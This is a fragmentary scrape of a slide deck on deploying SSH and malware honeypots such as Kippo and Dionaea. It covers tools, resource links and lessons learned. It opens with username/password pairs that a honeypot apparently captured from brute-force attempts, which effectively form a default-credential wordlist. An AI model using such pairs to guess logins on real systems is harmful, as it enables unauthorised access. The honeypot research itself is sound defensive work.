bang/bang engleza/engleza reebok/reebok sims/sims madi/madi mandarina/mandarina gary/gary qwerty/qwerty lamer/lamer dog/dog tetranet/tetranet amex/amex pix/pix shot/shot rusia/rusia postgres/postgres sync/sync tara/tara granta/granta
  • 74. Started – 10:10pm November 5th Total – 229 attempts from a single IP Stopped – 4:51pm November 6th
  • 75.
  • 77.
  • 78.
  • 79.
  • 80. Websites • Honeynet Projects - http://www.honeynet.org/ • Dionaea - http://dionaea.carnivore.it/ • Honeywall - https://projects.honeynet.org/honeywall/ • Amun: Python Honeypot - http://amunhoney.sourceforge.net/ • Kippo – http://code.google.com/p/kippo/ • Examples • http://blog.macuyiko.com/2011/03/running-ssh-honeypot- with-kippo-lets.html • http://www.austinriba.com/2011/10/fun-and-trickery- with-the-kippo-ssh-honeypot/ • ShadowServer - http://www.shadowserver.org/ • Spiderlabs WASC Distributed Web Honeypots Project - http://blog.spiderlabs.com/2012/02/wasc-distributed-web- honeypots-project-update.html
  • 81. Websites • Scumware - http://www.scumware.org/index.scumware • VirusTotal - https://www.virustotal.com/ • TCPIPUtils - http://www.tcpiputils.com/ (Great Chrome extension) Tools • Wireshark • Network Miner • Netwitness Investigator
  • 82. • A host at $IP ($location)tried to log into my honeypot's fake Terminal Services server • GET-based RFI attack from $IP ($location) • A host at $IP ($location)tried to log into my honeypot's fake MSSQL Server http://inguardians.com/
  • 83.
  • 84.
  • 85.
  • 86.
  • 87.
  • 88. Keith Dixon @Tazdrumm3r #misec – Tazdrumm3r tazdrummer@gmail.com http://tazdrumm3r.wordpress.com
  • 90. http://securityonion.blogspot.com/ • Installing a honeypot? Why not have all the monitoring tools already in place? • And there are some bad ass tools on this distro. • Counting Security Onion is Xubuntu based and all of the honeypot installs are based on Lubuntu, I suspect there won’t be any issues. • I haven’t tested this to confirm. If you find out otherwise, email me. I’d love to know your what you experience.
  • 91. Mercury – Live Honeypot DVD ftp://ftp.carnivore.it/projects/dionaea/mercury-dvd http://blog.infosanity.co.uk/2010/09/22/mercury-live-honeypot-dvd/ Mercury Live DVD was initially (I believe) announced in a post to the Nepenthes Mailing list. It is a remastered Ubuntu distribution with pre-installed honeypot applications and malware analysis tools created by John Moore. From the ReadMe: This live DVD is a remastered version of Ubuntu 10.0 Beta LTS x86_32. It was designed due to my being disappointed with another reverse engineering malware live CD that was released recently. I have decided to call my creation MERCURY, which is an acronym for Malware Enumeration, Capture, and Reverse Engineering. The Mercury live DVD contains tools used for digital forensics, data recovery, network monitoring, and spoofing. It should primarily be used as a honeypot or network monitoring platform as well as a laboratory and teaching aid. There are three honeypots installed – honeyd, nepenthes, and dionaea. Four, if you
  • 92. Scripts, tools and other lessons learned • Amun • amun_install.sh • Location to grab the file • How to set it up • Dionaea • install_dionaea.sh (Quick and easy setup) • install_dionaea_full_monty.sh (previously ran successfully on a Mint 12 install) • run_dionaea.sh • run_p0f_dionaea.sh (In case you want to capture OS information) • Glastopf • setup_glastopf.sh (Script untested, but ran through steps manually successfully) • Kippo • kippo_install.sh (This is one option on installing and running {last line runs it})
  • 93. Scripts, tools and other lessons learned Lessons learned • Run only one honeypot at a time • When running a honeypot from the cloud, test test and retest your packet capture script • When in doubt, use dumpcap (it’s been the most successful for me) • Adjust the level of logging on dionaea if you’re running in the cloud, especially if you’re in an extremely active area. • Downloading a 4 Gig log file from Ireland was not a quick process • First time running dionaea, log everything. • Adjust your logging level according to the information you see. • If a lot is not useful, dial it back a notch or two. • Install on an Ubuntu based system. • I tried installing on a Debian based load and ran into dependency issues. • The keyboard is small and I want to minimize the time at the keyboard. ;) • I haven’t tried Fedora or OpenSuSE or BSD based systems. • If you do, let me know your results. (See slide # 88 for my contact info) • Take the time to get a good dionaea config file. • Getting the malware is good. Automatically submitting to

Hinweis der Redaktion

  1. Insert video from Duck Dynasty here?
  2. Insert video from Duck Dynasty here?
  3. Put the ports opened up by dionaea and the results of an nmap scan
  4. More interesting stats (by country?)
  5. Re do the stats
  6. Re do the stats
  7. Re do the stats
  8. Re do the stats
  9. Re do the stats
  10. Re do the stats
  11. Re do the stats